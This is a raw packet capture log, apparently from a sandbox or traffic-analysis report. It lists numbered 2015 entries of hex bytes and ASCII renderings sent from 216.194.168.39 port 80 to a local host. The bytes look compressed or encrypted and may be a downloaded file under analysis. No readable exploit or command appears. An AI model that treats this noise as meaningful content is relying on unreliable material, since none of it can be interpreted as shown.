Data Ascii: AQlC>RMd+}]z%{f5B:eo'>`|xmH2Z~}wS;IOt-]>P:?$$f?\>]^+~3'x}!W>L)z}4TP0%^>c;kXBz0[z>}J3D"+WG^/
314
Feb 19, 2015 13:02:00.968528986 MEZ801032216.194.168.39192.168.1.10Data Raw: 0e ce 91 ae c0 c7 3e c1 86 06 44 12 1b 54 79 7b a4 a4 f0 39 c8 fa dc ba e3 b0 d3 e5 ee 68 64 56 55 a0 3e 6d eb 3f 30 be 01 8a ee 82 6d ec 5a ba d8 5b ca 98 e7 81 6a 57 c0 ed bf ea 79 ac 0d f6 50 c5 40 ca ee 85 3e 36 a5 a6 b0 ec a5 09 20 8b a3 71
Data Ascii: >DTy{9hdVU>m?0mZ[jWyP@>6 q%hby[T`tA.H9"_b>Kchz]m3|UH#O:?&o}s>;aeSw0jS1elK;}ghGYNm0n^
315
Feb 19, 2015 13:02:00.968532085 MEZ801032216.194.168.39192.168.1.10Data Raw: a8 1e 7f 78 d8 b4 7d a3 e8 2b bc d2 85 8e de f5 f9 ac c1 87 ad 79 ad f8 6b e3 3e 25 88 66 4c 5e 53 ef ae ee b7 a9 67 eb 7b e1 bf 0e 88 7c 3e ec bc 1e 9a e6 93 21 37 f2 44 cc 65 8f 2f 96 e7 07 e8 e1 3c 20 f4 ef 7c eb 38 ac 2a 68 fd f1 6f 0f 9d e3
Data Ascii: x}+yk>%fL^Sg{|>!7De/< |8*hoF3:b2sS'P>prTmqBB;;Ac3>I`C:QNH>tzy#~z~/2k@ArX\>Ygj+:/kW?vXs?S4W>hG e
317
Feb 19, 2015 13:02:00.968641043 MEZ801032216.194.168.39192.168.1.10Data Raw: 56 83 79 46 a7 d3 5b 53 a3 50 91 ac 52 f7 7b 3d ea f5 da 06 2b 86 3a 36 7b ac 57 13 70 d5 d2 e6 9c de 3e 12 2a 7c d0 c9 b2 e4 ff 5c 4f 50 a1 2b d4 68 a2 d5 ea 52 c1 64 c2 9a 01 d2 ca ac 52 8d f5 a5 3f 36 62 4b 2e bf 53 d8 c9 bf e1 ac f2 2d ea a6
Data Ascii: VyF[SPR{=+:6{Wp>*|\OP+hRdR?6bK.S-}_5]u>Z~l9?jeR40}PeZ<69|Z5gLW^>~_z
317
Feb 19, 2015 13:02:00.968648911 MEZ801032216.194.168.39192.168.1.10Data Raw: 56 7c cc 8c db 05 0f 27 03 69 ea 1a 58 16 40 e4 bf d7 c1 ac b9 c3 81 49 9e 1f e7 ec 3e 07 77 fa ae 05 d9 fa 41 85 43 21 ae 1d be 21 4d c2 fa c2 01 c8 dd 57 32 9e 8d b0 3e eb 5a ec 39 e2 0b 61 6f 8c 8e 00 bd 80 a2 c7 57 cf ea e4 fa fe 55 01 a0 a5
Data Ascii: V|'iX@I>wAC!!MW2>Z9aoWUQ^*!UAddvXQ><|<-xR/|B>R<G8>fgn\1X;#kMR-{D^#gs;>S
318
Feb 19, 2015 13:02:00.968655109 MEZ801032216.194.168.39192.168.1.10Data Raw: 6a d1 5f c4 47 ca 83 81 fe 25 f2 e9 41 1d fe e3 3a 77 ff ac 82 0f 0e b3 53 4c 2a ef 3e d2 7e aa 6d 55 3e 1e 16 f2 60 c3 bb 24 33 51 c1 b4 eb e7 12 4b 19 a2 b6 68 66 ac 20 be 7c 2b ce 26 e3 c6 3e 9c 6d 10 7f ef 88 e3 e2 fb ff be a6 7e a3 0a 9b c2
Data Ascii: j_G%A:wSL*>~mU>`$3QKhf |+&>m~=%;O.mF}>wwJ:m->~MP@76)l8?wdDCv2S>8RK+JDq1nA<Y|jF*9?_~;!fUce)
320
Feb 19, 2015 13:02:00.968771935 MEZ801032216.194.168.39192.168.1.10Data Raw: 65 4b 1f 8b 48 47 95 d6 c1 95 f6 a0 95 9d 3b ac 92 6e ac 52 2a 7e ae a5 3e e0 09 72 4c 00 ce 8a 44 5e 5a 11 54 c8 91 48 27 0e 6d 1a b0 2a ac a6 72 fd 91 e3 3e f5 80 f1 00 32 7a fa 09 65 95 c6 58 1d 25 b4 da 8d ed 86 91 48 0a 43 df 2a 22 ac 9b 6e
Data Ascii: eKHG;nR*~>rLD^ZTH'm*r>2zeX%HC*"n<fT>|`nmZ3nX4~miwdp/>kJl|]j~GNr\%`X,:b4=h<;]D>}1f:vPNlRX}
322
Feb 19, 2015 13:02:00.968776941 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 81 13 0c 38 31 69 89 4b c5 f6 98 19 b9 a2 4d 72 3c ee 33 41 3b 2b cf 24 cc 8e ac 9b d6 60 c2 9d ca 0f cc 3e ee 8b 23 ca 96 c1 ef 2b ce 62 da 93 05 3f 64 b6 81 8e ff e2 d0 e5 f6 61 5d a4 aa 59 d3 60 9a b2 45 31 8e 62 d0 ee c6 f2 5f 54 52 38 46
Data Ascii: >81iKMr<3A;+$`>#+b?da]Y`E1b_TR8Fy@3ja>AaP<{o8'2j.g;/e:0'-o:kzJ/>/6`=PnJniA680!?&dW-1Teuok>ovWU<|(3zj b2v<^b
323
Feb 19, 2015 13:02:00.968779087 MEZ801032216.194.168.39192.168.1.10Data Raw: a7 1a ce 9d f8 33 dd f7 36 d3 8a 7c 75 a9 54 ac 7f 23 e7 3c 66 37 d0 46 3e 77 e4 5c 07 4d 56 4c e9 38 b1 37 60 ce 9d 3b 3f e1 f0 1a e7 48 1c 47 16 b4 90 ac 23 fc 99 7a 7e 81 90 f7 7e f0 f1 9c 2b 8e a5 97 34 04 f0 36 12 0b ae 9a aa 00 d1 ac da 77
Data Ascii: 36|uT#<f7F>w\MVL87`;?HG#z~~+46wlp>4BWAH0TuVw;>Z)KOe|*4i~<0764XkAmUwR>17_-`. U#7\rc5OkG>? Ql%bXXu
324
Feb 19, 2015 13:02:00.968873978 MEZ801032216.194.168.39192.168.1.10Data Raw: 10 50 08 ac 09 f3 ba 0c 06 31 bd 85 3e 15 a7 e1 ca b4 20 93 59 a2 ce 32 ef e5 a4 03 44 fb f1 99 da 97 8e ef 2d ef 4c ac 81 c1 2d 92 5f 30 ee c3 3e c7 6f 19 a4 06 ff c3 13 b3 94 e5 ec 43 f4 c6 fb fa 33 ed 3e 65 27 48 8b eb ee 98 32 b0 b8 7a 33 9a
Data Ascii: P1> Y2D-L-_0>oC3>e'H2z3t#sgZ+J O&~Q>;}kYS@$EYH>B\)G$gx3mdvCWa>!:\$LE}.
325
Feb 19, 2015 13:02:00.968889952 MEZ801032216.194.168.39192.168.1.10Data Raw: 2e 05 0a d8 32 45 be cb f9 24 f6 a5 8c ef f2 f8 00 a7 e6 08 f1 50 e1 ac d6 64 1d 04 78 85 cf f0 3e 0c 1a 4d 46 91 f8 a1 5e 0e ab fe f2 1e ba e4 25 08 1b ac 95 04 88 26 3e 1b bd 61 3e 12 dd 57 3a 10 6e c2 f6 55 5e b2 e1 e1 78 67 27 d8 f2 c4 6b 0b
Data Ascii: .2E$Pdx>MF^%&>a>W:nU^xg'kH`14>^"^RDek1p#ge S/n^'Z`>:c3>Q6euyj3gT=VlS;|3|b[]5
327
Feb 19, 2015 13:02:00.968894005 MEZ801032216.194.168.39192.168.1.10Data Raw: 7f 12 a7 9c 44 a6 8d 42 31 b7 29 b0 53 06 f3 83 40 e2 c2 29 b4 a7 ec ac 22 d7 36 ef 4a 8f c8 8a 3e 38 f4 ef 89 cd cb ab 91 bb 39 d2 69 62 e3 e6 45 9a f3 19 02 9a 78 e6 f8 f8 78 ac d9 a0 c7 04 bb 50 b1 48 3e 79 b2 cb c6 50 8b 14 87 c4 41 21 7f 97
Data Ascii: DB1)S@)"6J>89ibExxPH>yPA!eFsUb?okE_w>rSK:>$#pq*yuE(!>G}Hmje3o[1Sa8jW>#{
328
Feb 19, 2015 13:02:00.969018936 MEZ801032216.194.168.39192.168.1.10Data Raw: f7 cb 7a 91 86 1f 89 35 3f 61 b4 88 3f 60 f5 ad 7f 06 81 88 1a 22 d1 a8 3f 50 f5 ba 4a 45 d1 ed 4a 26 d1 ed 1a 66 b4 ed fd ce f5 67 2a 6e 94 68 05 24 0e ac f5 52 8a 9d 7e 82 5c ba 3e 63 e0 a3 45 6b 23 d3 67 2f 79 6a cf 4a f8 f6 dd f2 f5 ef 4a 85
Data Ascii: z5?a?`"?PJEJ&fg*nh$R~\>cEk#g/yjJJWJj>`t18v0@uJ>L,|?\j?Y!OG-7I>/Y}$-Hb96B%<;k ->{<O)0G#v:l.}o<>,e}Xg
330
Feb 19, 2015 13:02:00.969022989 MEZ801032216.194.168.39192.168.1.10Data Raw: 58 8b 83 93 6a ab 92 e4 53 4d f7 0c 49 a5 bb 26 3b a5 3e cd 3e c7 0c 04 9e df 04 73 d7 92 c8 d0 22 9f 23 c2 24 f3 f6 0a 07 3b 4d e1 81 d0 8d ac 47 c1 49 e8 3b f1 ba eb 3e a5 51 08 08 d2 9d 57 12 9b ee 35 f2 dd b4 21 1a f4 f0 e1 61 98 af aa 54 35
Data Ascii: XjSMI&;>>s"#$;MGI;>QW5!aT5QMB'V1y>3"93X=[S%"S^)QzI>avmF$az>UPoJ>{?+@m
331
Feb 19, 2015 13:02:00.969027042 MEZ801032216.194.168.39192.168.1.10Data Raw: ee 34 3e a3 3e ff 4c ec 7f 86 e7 86 52 fb db a1 a2 93 14 d8 7e 84 77 10 31 9b 9f 45 f2 bc c8 a8 3f 39 fc 86 b1 05 bf 6b 13 23 f8 a1 3a 88 bb 30 7f b2 b9 ac 7f 75 95 56 32 6a 9b a8 be 12 74 be 44 49 90 0c 81 0a f9 15 3d 30 9e a6 ad c5 64 83 3e 3e
Data Ascii: 4>>LR~w1E?9k#:0uV2jtDI=0d>>"@8P}0^>zvaRyV4%d/uGQ>?^ V>b%g@.dxz \3y6>Dr.`;t)Frx>$?uo
333
Feb 19, 2015 13:02:00.969109058 MEZ801032216.194.168.39192.168.1.10Data Raw: a2 88 0d ec 3e c5 bd 08 44 09 fc 25 c6 68 ac 33 52 29 bd 61 e4 ab f9 88 01 e9 24 30 92 81 5d ac 57 f3 6d 32 d6 eb 42 fa 7e d0 e7 66 53 31 01 97 35 5b f9 b2 ff f1 db 00 a2 ac ff ac 2e 3b 63 ff 68 6f 18 78 3e 9d bf a7 d9 d3 b8 2e 29 78 94 81 a9 e4
Data Ascii: >D%h3R)a$0]Wm2B~fS15[.;chox>.)xKPlQi8%Ej?yqC/3Np><+l<>w~bZKt"~=.P'3U1>b/B?T$FQ3=;R}Eo
334
Feb 19, 2015 13:02:00.969233036 MEZ801032216.194.168.39192.168.1.10Data Raw: 66 2b b4 4d ce 92 3e d3 ce 01 c9 46 60 b8 c2 8c f8 cf 7f 65 a7 ec 1c b0 fa 9a d9 13 a0 91 ea 25 b8 ac a3 58 47 ec 09 36 ed e0 3e be 2c ed cc db fb 9f 10 95 d7 6c a2 5d e1 b8 0a 24 fa a0 39 41 d6 20 65 83 df ac 3e b0 ba 92 8d b1 be 92 3e d5 8c 30
Data Ascii: f+M>F`e%XG6>,l]$9A e>>0,@swz5t{ >;uxs8e)>&>5Wp/e-?>~fPD_>M0*}(](
336
Feb 19, 2015 13:02:00.969238043 MEZ801032216.194.168.39192.168.1.10Data Raw: 54 98 68 40 bf fb 07 37 a3 e7 a4 8a 52 68 61 e7 50 69 d5 8d 8c fd 49 07 eb d3 3b 2c 7b 47 d3 d7 8b cb 96 60 1e e5 63 8a 71 40 77 85 ab 6d c9 05 36 ec 7f a0 b8 ab cb 60 21 d1 77 65 fc 03 c4 d4 d9 dd 45 5a f0 81 50 65 77 37 7f 2b b9 c5 a9 d5 07 51
Data Ascii: Th@7RhaPiI;,{G`cq@wm6`!weEZPew7+Q~/Gf"VY~iD9a^~+P;ppm/NhZhEl,5!<q0QjC~1joQq8A;x!wH?ZG|Sr
337
Feb 19, 2015 13:02:00.969242096 MEZ801032216.194.168.39192.168.1.10Data Raw: 45 35 64 f3 1f b0 09 65 cb e4 61 52 f1 9f ab d5 83 93 5d 40 d9 fc ab 3b 54 95 ab 29 e4 b8 3b 5b a8 33 8b 3b 9d 38 2e c8 bc 93 7e a8 aa dc a4 bc 91 28 fd 3b 6d 80 7c 04 1c a3 43 74 73 93 44 40 bf 96 4f f1 af 38 45 32 63 d5 d6 20 e4 ed 58 3b 1d 07
Data Ascii: E5deaR]@;T);[3;8.~(;m|CtsD@O8E2c X;ShSJ(E5E[{Sv3TSI]GESbGvX~Pb!UE/..IY&ksFnERQXYN+|~n6ev Vqv{H5h)Haec`pEL
339
Feb 19, 2015 13:02:00.969244957 MEZ801032216.194.168.39192.168.1.10Data Raw: ca b0 76 06 9e 4d 6e aa 78 e2 1c b7 70 d2 ff c8 32 ed fb 5a e0 8d 05 0b 1c 50 6c 4c 70 fa a9 b6 e4 d9 e7 e2 ee 0d 71 9d 1d 8f d3 b7 95 82 05 33 e7 36 3f c5 9c df 0c 8e 4d 14 cc 01 e2 95 e9 1f d2 08 f2 da f9 a4 2a d9 73 ec 82 28 59 91 5e 98 af ed
Data Ascii: vMnxp2ZPlLpq36?M*s(Y^)#z>o2}54cO_)2|y FRB?5cI{<m/f=,>&c?!Rz2)&Lik^u
340
Feb 19, 2015 13:02:00.969280005 MEZ801032216.194.168.39192.168.1.10Data Raw: 00 9a 3f d7 1d 14 34 3e 01 ae 2a be 28 c6 c0 12 e9 b9 d6 8f 02 b7 62 40 0b f1 60 1c 00 f7 b4 a0 5c 6f 6a cf 4d ad 1b 4f 8a 85 b4 07 1d fc 7e c2 40 b4 6f a0 c5 a9 37 89 0e a8 ff 5b 3f ad 35 4c 4f 89 39 4c aa 90 fe 4e 23 6d 3e 5c c0 ad 3d 90 00 0d
Data Ascii: ?4>*(b@`\ojMO~@o7[?5LO9LN#m>\=tLS~Tm>?Wm?'Mk[Km>g%_am,aCbm>(fsm>am>;}j*km>kN?pqm>GWuMm>5$>
342
Feb 19, 2015 13:02:00.969331980 MEZ801032216.194.168.39192.168.1.10Data Raw: 24 ad b0 8a 54 cb ed 12 5c e0 3e 01 3f a5 83 a3 7d ec 93 a2 87 d1 11 ab 28 a9 61 d4 0e 3a 3e fd 12 97 39 25 e9 fc 8c ab 08 c7 62 7b 03 64 3c c2 58 72 3e 2b fb e0 0b 93 1c ef f4 d8 f7 f0 7f b4 52 72 3c 63 03 35 3e 9b 63 a7 d2 b3 af 7f 66 bd b8 a7
Data Ascii: $T\>?}(a:>9%b{d<Xr>+Rr<c5>cf|.])ZefvN2=^6htQb8Yl^3c^-o>>=>i;Kih;o=^\2~2;2:wP\z6]a*>\d2vq{BbQ>
342
Feb 19, 2015 13:02:00.969391108 MEZ801032216.194.168.39192.168.1.10Data Raw: ed c0 cb 51 ae ec bd ad aa fa 3c 11 02 ce eb 5d 48 29 a6 d9 89 ad 13 1e 58 52 62 69 1f a5 5e 85 e0 61 36 11 dd ae 24 56 1e ad 7c 3b d7 0f bd 80 5f 33 3e d5 62 cf de 1b 69 27 81 5f 9d b8 4e a1 0d fe 3d f1 02 ec d6 46 ec ec 12 27 43 ad 16 31 e6 c8
Data Ascii: Q<]H)XRbi^a6$V|;_3>bi'_N=F'C1bS=:nd2t4Ak>hfm|9Vd22:R=+rqm_4P>@0x%^(8?:^zC}<C?|C2ABb9Bb>3E6>F~%Ce>
344
Feb 19, 2015 13:02:00.969394922 MEZ801032216.194.168.39192.168.1.10Data Raw: 7b 21 66 d0 7b ad 22 8f 24 f1 2a f3 d2 4b 3e df 85 dc a9 1f 22 e0 4f f3 8c d1 7d 68 8c a9 c4 aa 50 ec 3e 38 ee ca ad f9 09 69 20 c8 12 f5 3e c4 3f a3 f1 eb 03 72 5a c5 43 cd 7b 0c 36 ad 5a 29 b4 24 47 bf 46 e4 3d c0 07 a4 3a a2 61 99 7c 7b c2 ad
Data Ascii: {!f{"$*K>"O}hP>8i >?rZC{6Z)$GF=:a|{n>C?.IbYk\got>C1%>S}\WaH"u}3K:.:-T[Ro|mmwq_M:<1>1"}rp8WQdJbaD0
345
Feb 19, 2015 13:02:00.969494104 MEZ801032216.194.168.39192.168.1.10Data Raw: a8 5b 0d a1 05 c4 4a 3d 4d 6f 77 13 28 2d ee 13 a0 73 7d ed 03 b6 1e 30 68 ce 0a 59 44 93 12 4b 05 70 31 5a f3 35 4a 05 21 ad ea e4 91 9e 55 f6 50 36 2e 29 73 cd 91 a3 19 31 0b f0 05 07 7d 96 fb aa 23 39 41 ad b9 b9 6c 81 53 93 28 b4 36 5d 85 7e
Data Ascii: [J=Mow(-s}0hYDKp1Z5J!UP6.)s1}#9AlS(6]~3])bmRKJ>,G]Gw?3cQkIn>qkRNwgHb}3W@o)[:te2SHi|>t>_R!SWs>^oo)De`~6*
347
Feb 19, 2015 13:02:00.969497919 MEZ801032216.194.168.39192.168.1.10Data Raw: e2 d1 64 d6 06 4d d2 dc 63 64 d1 09 9f ad 52 fc 6b 9b 3b ef 10 a5 3e 7c 6c 0f 5b 21 b2 a9 07 99 8f 42 15 ca 02 fe 75 6e 23 fe 3e e0 a5 3e ae 84 48 5a 4f a4 4e a6 aa 73 32 ec ff 31 06 85 27 c7 ff a0 2b 48 9d ae 91 aa af ae 7a 25 f0 b1 66 55 06 6a
Data Ascii: dMcdRk;>|l[!Bun#>>HZONs21'+Hz%fUjU*UNyidNXE>HFyy}1>Jo|o!mcQv3^UnIV*j>UIb)a_>~h4-l,,s\FPC=
348
Feb 19, 2015 13:02:00.969501019 MEZ801032216.194.168.39192.168.1.10Data Raw: 21 7f 2e 4f 1a f9 d4 ba 65 21 29 97 08 a3 11 f4 fa 24 a2 54 8b ad 23 31 22 f8 a4 43 23 4c 3e 0e f9 ed 3d 12 37 bb 1a 1e ec d3 71 ba b3 aa 23 8c 1a ad 26 8c 38 bc a9 27 91 e8 3e 08 4c 82 72 23 ca fd 44 15 0d b1 78 61 13 45 35 0e 08 b2 01 b8 3d cd
Data Ascii: !.Oe!)$T#1"C#L>=7q#&8'>Lr#DxaE5=Fw\$T+VNuR-ld^S>NRS#rcy+x94lJll*IBOm0S!yA="yn1BvH$QK>A^f8$S>(rvN.fz
350
Feb 19, 2015 13:02:00.969582081 MEZ801032216.194.168.39192.168.1.10Data Raw: 09 f7 35 c2 76 e0 7e a5 38 cd 1e 14 a9 f0 ff 6a 74 17 3c dc 09 d5 54 21 a2 9a 7c 04 8f 6d c0 ab 12 5b 94 5b c6 9c e4 79 09 02 77 59 75 61 76 19 82 ad bb 58 55 cd 3d 48 cc ee 3e 6a 14 3c 7c 7a 32 48 31 82 01 16 c6 9e 3b d9 18 8f 09 fd 55 65 3e 84
Data Ascii: 5v~8jt<T!|m[[ywYuavXU=H>j<|z2H1;Ue>\.:y.sN]7.Zio-_WZ"=vSK/>j#0'p:^>e\w:^
350
Feb 19, 2015 13:02:00.969609976 MEZ801032216.194.168.39192.168.1.10Data Raw: 19 d6 09 59 5b 8d 76 50 ff f4 ed ad c8 09 46 44 c2 ca 0d 2a be 6d fd 95 57 24 ac ca 61 a7 08 f4 3a 58 8e f8 f2 da 52 5b 3e f3 26 8e 79 6b 5d 3e 8d 68 a9 e0 6d 82 4b 57 a1 ad 33 ae 3e ad fe 6f 9a 58 9a 5e 3e ad 65 fe 59 62 4b ed 75 08 09 24 38 fe
Data Ascii: Y[vPFD*mW$a:XR[>&yk]>hmKW3>oX^>eYbKu$8iD3Y\":z~>bohm4ZO4>@sv}iJ}H>H^H;PG[#s:A6cF%Lu#`miwEX[>XO@
352
Feb 19, 2015 13:02:00.969614029 MEZ801032216.194.168.39192.168.1.10Data Raw: 52 3a 0b 3b 2c 60 71 e0 f8 f0 55 6d 55 46 34 97 5b 57 b4 ae 87 0d 0b b7 37 c1 eb 10 c3 00 f6 6d 4d 86 b6 03 17 1b b4 af 87 11 0b 74 4a c0 27 61 c2 22 29 ad 69 29 73 12 7d c4 b8 7c 3e 1b 34 12 7d 26 0a 72 14 9a 91 09 dd c2 62 03 54 d3 08 ac f7 1e
Data Ascii: R:;,`qUmUF4[W7mMtJ'a")i)s}|>4}&rbTR"5.`s b<#g+$w):Vp[e%w8/nrjqz;u>Ca=Rfro=MT>e7$*S!@W^};<z4D.E#\>)"<E
353
Feb 19, 2015 13:02:00.969726086 MEZ801032216.194.168.39192.168.1.10Data Raw: 79 14 f3 b4 2a 7f 04 10 38 63 01 52 f3 40 1c ad f6 d9 e0 b0 71 9d a2 bf 3e 5b 39 b1 7d 1c 56 33 01 7e 1c de 60 7d c0 e6 b9 86 08 3e 7c 5a 02 a7 9b 20 c7 1a 3e 94 7e 0b cd a6 90 ec 1e 85 bb e4 c2 fb 35 21 32 2c 0c 78 77 d3 0a 88 41 a6 d0 ad 36 7f
Data Ascii: y*8cR@q>[9}V3~`}>|Z >~5!2,xwA6.qQ%d.JeJm}22/:55EI>n-XEp>\rbfl%6I]SS$Sjl?4&;!vwCx.
355
Feb 19, 2015 13:02:00.969728947 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e af aa 58 05 83 1b e2 f7 e6 12 a9 27 e2 ff 5b 33 79 0b 50 3e 35 7f 7c f4 75 4d 6b 4d ea 4c db 76 e8 94 54 fb d4 0d ec a0 de 32 d9 eb a0 6b a1 74 52 d2 ae e7 f3 19 99 21 93 0d 5d 27 ef 3f bd f6 ab 2c ad f4 e4 27 dc 14 2d 7f 11 3e 3d 57 94 0e 0c
Data Ascii: >X'[3yP>5|uMkMLvT2ktR!]'?,'->=W}=PO:>~)0774kugsvNgg=8=:/>} b=A j&fFNmZ8>dn~xJLJ>|ZZ5n1mto
356
Feb 19, 2015 13:02:00.969733000 MEZ801032216.194.168.39192.168.1.10Data Raw: 2d 90 0f 07 3d 91 0f 5a fe 42 e6 6d 3e b2 cf ad 97 14 85 ac f5 95 0f 16 fe 56 be 6d 3e 02 0e ad b5 98 0e d2 fe 59 7c 6d 3e 3f 5a 6d 3e 02 cf ad 75 3c 0f 96 5e 5d 26 78 5e 5e 14 cd 3e 56 6f ad 5f 81 01 ad 3e cb cc 4d 2a b1 6f ad 8f 03 0f 5c 5e 64
Data Ascii: -=ZBm>Vm>Y|m>?Zm>u<^]&x^^>Vo_>M*o\^d2^e>oM_^iL>]oBo+^miH^o>oo(^sv>f>(os^wN^~>M>x><K)mPbm`Z^Z{mvkv?e^kK^L_PO>w
358
Feb 19, 2015 13:02:00.969805002 MEZ801032216.194.168.39192.168.1.10Data Raw: 30 33 06 09 2a be 1f 9b 71 73 d0 98 81 d7 10 b8 df 2a 6e 83 fb b8 91 b3 44 4c 16 22 38 4b 16 2b 38 25 22 b1 3e 2b 64 ec 6b d9 8d eb 64 c8 78 c0 f0 7b 31 fe fe 6e 10 bc 43 a1 1c 28 10 f8 52 b3 e7 62 15 02 3b 61 15 0b 3b 86 19 90 3e d1 0b fc e2 fb
Data Ascii: 03*qs*nDL"8K+8%">+dkdx{1nC(Rb;a;>`Q{U>1F/yFSXn88!Z:]`-B-rj?0'pm=s+2-\n9->]QT"qFlLPVD]pK[BQh29g;9
358
Feb 19, 2015 13:02:00.969866991 MEZ801032216.194.168.39192.168.1.10Data Raw: 0e 64 50 2e 50 3a 90 88 20 90 11 e7 76 c0 34 c7 58 a7 37 ad 2e 23 9a 7b 7b f7 72 a8 3e 04 18 67 e3 95 cb 7d 32 6d 03 c7 e2 93 d4 4d 5d c7 11 e2 0b d1 8f aa 21 a8 b4 a9 39 46 2d 95 a9 cf f8 ca ae 74 53 ed 54 94 35 3d 49 5d 11 a6 7a c3 fa 0e 9f f5
Data Ascii: dP.P: v4X7.#{{r>g}2mM]!9F-tST5=I]zVZ:L>M[k}V>@d4>[yF&#%,)df"X$>nd1eYjw1>0q$*iXt>=Q_CVjP>c
360
Feb 19, 2015 13:02:00.969871044 MEZ801032216.194.168.39192.168.1.10Data Raw: eb 8f ff 9e d6 58 1b ad 79 bb 15 fd 2a 94 31 28 3e d8 4d 81 44 83 dd 73 39 d7 f5 cf 73 79 2b 8c 7f 96 e2 3a 83 86 17 72 38 04 14 72 38 0a 14 ad 7a b9 40 5b d7 f4 61 e7 3e 8a 8a b0 59 9d 5a 2b c6 61 4e 8b d1 4a d8 3e 6d bc 17 aa 61 e1 4d a8 68 e0
Data Ascii: Xy*1(>MDs9sy+:r8r8z@[a>YZ+aNJ>maMh|bV~X>P.D1r;0{;J]@5>h4Uy9F>G<YA:R|>cSdA~<q%\Yr-_:Wb8b8C[L=2F@
362
Feb 19, 2015 13:02:00.969918013 MEZ801032216.194.168.39192.168.1.10Data Raw: ae c1 1a 57 30 b8 55 ad 48 5c 55 aa 67 c4 ef e0 3e ca 7c e6 ac 1b 50 7b 17 44 1f eb 7b 4d 81 0a 40 70 14 87 bd 82 99 11 37 a6 59 ad ec 5f 7f 04 5d b5 cc e3 3e 39 20 ac 2f db b7 00 50 4d e6 85 50 5c 6c f8 32 73 e4 33 da 4e 19 62 39 9e 13 62 39 94
Data Ascii: W0UH\Ug>|P{D{M@p7Y_]>9 /PMP\l2s3Nb9b9~WXC>ZtWaDrN[O0LsEf?gqoPQ,)+wW>)HgjBg"lhifE>e;ht[;eTc_l'|1fY
363
Feb 19, 2015 13:02:00.970036983 MEZ801032216.194.168.39192.168.1.10Data Raw: 36 25 71 aa 82 82 e5 ff d9 c3 15 d2 03 90 56 87 b2 81 d4 ad 72 54 10 71 7e 4c aa 5e 3e 7a 52 bc 92 f6 69 04 1a b4 3e 52 b6 f4 10 f1 28 21 15 cd 50 2e 01 e1 fe 13 2a ad e9 86 9f c2 a9 ba 73 63 1e 22 2a df 7f 56 e9 b0 51 0d 15 2d 66 62 97 79 14 6e
Data Ascii: 6%qVrTq~L^>zRi>R(!P.*sc"*VQ-fbynjRB210>8u*}-AS+*&~]>[6f 1&Ck8\>BP*2U.teD#E#>xUT@^rF!8~O> X3"TL22!@
364
Feb 19, 2015 13:02:00.970104933 MEZ801032216.194.168.39192.168.1.10Data Raw: 0f 23 16 58 5b 94 c6 b8 d1 9c c0 ad 2d 9e ac bd f2 cb 3c 51 3e 20 f2 89 44 7e 24 31 3c 4b e9 a1 05 23 50 2b 53 0e 39 be 3e ae 69 d3 01 9c 29 1b 22 4d 11 c8 42 f5 b2 d0 2e 24 16 3d 0b 9f 6b c2 26 73 7a ad 99 5b 15 80 6f c4 3c 70 3e b4 0e a3 b9 13
Data Ascii: #X[-<Q> D~$1<K#P+S9>i)"MB.$=k&sz[o<p>R6W9WF#@>xW[UzH~aL[._0>?~Sd+;)Ws10<*#P+4Ns;+m>yfufh?":?\EUB2;;;GW>q
365
Feb 19, 2015 13:02:00.970108986 MEZ801032216.194.168.39192.168.1.10Data Raw: 96 9a 17 25 7e e8 34 93 e4 9a 0c ad 5e f0 55 bd a9 a4 5a 0d 3c 7e ab 9c b4 0c fc 9e 89 0d 17 08 2f d4 4c 37 15 04 bf ad df d8 ed bd a4 ac 48 a1 3e e5 dc 88 1f 5f 05 3b b7 bc fe af 5a c6 4c 7a 91 9c 17 a0 02 5b 07 ef 81 d9 12 ad 22 b1 f4 15 d5 ff
Data Ascii: %~4^UZ<~/L7H>_;ZLz[".FlS+@QoxDEh`6]^G?d|s8%>F4VAAmxJ(M>9+K8nv (W|5[>:1UDyz>\68>+Y
367
Feb 19, 2015 13:02:00.970112085 MEZ801032216.194.168.39192.168.1.10Data Raw: df 99 95 e5 9b e3 19 76 39 50 20 ee 7f 29 15 a2 21 ae a6 ab 81 26 ae ab 9d 3e ff ec 3e 5e 95 02 87 90 1b 55 77 24 70 60 50 9a 41 88 c4 a5 d9 5c 0a 64 fc eb e2 a7 1c 22 3b 2a 96 a8 b8 2f 1b ff 3b 0b e0 0a 3e d9 ab 01 7e 69 ef b1 57 2e 49 c2 13 49
Data Ascii: v9P )!&>>^Uw$p`PA\d";*/;>~iW.IIyX?S!qA>nV_A$xW=]0>6=9wDpD>{LA+&@OXIK!&9y8 //>bQ@g9ZK]S*?[OYt)>K"_,lj!9Y9
368
Feb 19, 2015 13:02:00.970115900 MEZ801032216.194.168.39192.168.1.10Data Raw: 4d a6 7d 8b 53 d3 1a 30 1f 53 ce ca d2 7a 07 a2 b1 8a 95 ab b1 8b 9c ab 1d ce 61 dd 3e dd 1f 7d 6a bd 78 cd 71 91 65 2f 74 cf fe 98 45 2a 1a e3 44 71 6c 0b 13 02 5d ad 53 22 04 59 54 dd bf 72 3e 9d f0 a9 c4 f8 46 fe 59 95 b5 ab 91 9d b5 ab 98 9a
Data Ascii: M}S0Sza>}jxqe/tE*Dql]S"YTr>FYT~Ix.x)P/s?d>.Z4XiRo!~HZTQSFCaEaLNBX>kqbH>]OMIzB|t9F{9q>8jp%yyQ2!t
370
Feb 19, 2015 13:02:00.970192909 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e f8 0d 7b 4f 49 76 3a 2d f7 83 c9 38 ce 79 05 93 74 5b ec aa f9 00 61 ae 47 01 ed 3e 23 17 6f 6b d9 1f 79 0e fe f8 95 c0 f8 0e a3 df 8d 5c 80 b6 fd bd d9 a4 7e 09 a3 3e c8 d9 08 5d 28 06 a1 df 05 5c af 25 03 a9 91 69 e5 1c 31 5b 70 5b d6 04 5a
Data Ascii: >{OIv:-8yt[aG>#oky\~>](\%i1[p[ZW>`.xJvpw"zAt>G]U8k$$5rY_.b]40Z[>|^}~#^0Z>~>d#&2lf%1(%22~}`-m>^gq?2=]
371
Feb 19, 2015 13:02:00.970225096 MEZ801032216.194.168.39192.168.1.10Data Raw: 97 66 1d 7d da 50 97 75 25 47 00 ad a5 7f 11 da 98 16 69 2d 3e 37 0c 40 23 56 d9 9a 8c 17 28 12 cb 78 f2 b3 69 96 1d a7 01 79 bc f5 27 06 9c ad 78 fe f2 5c 34 33 ce 73 31 01 1a b2 39 00 1a bb 39 bc 5f 78 fd 21 e5 af 20 82 26 e4 5b 02 1d 22 6c b3
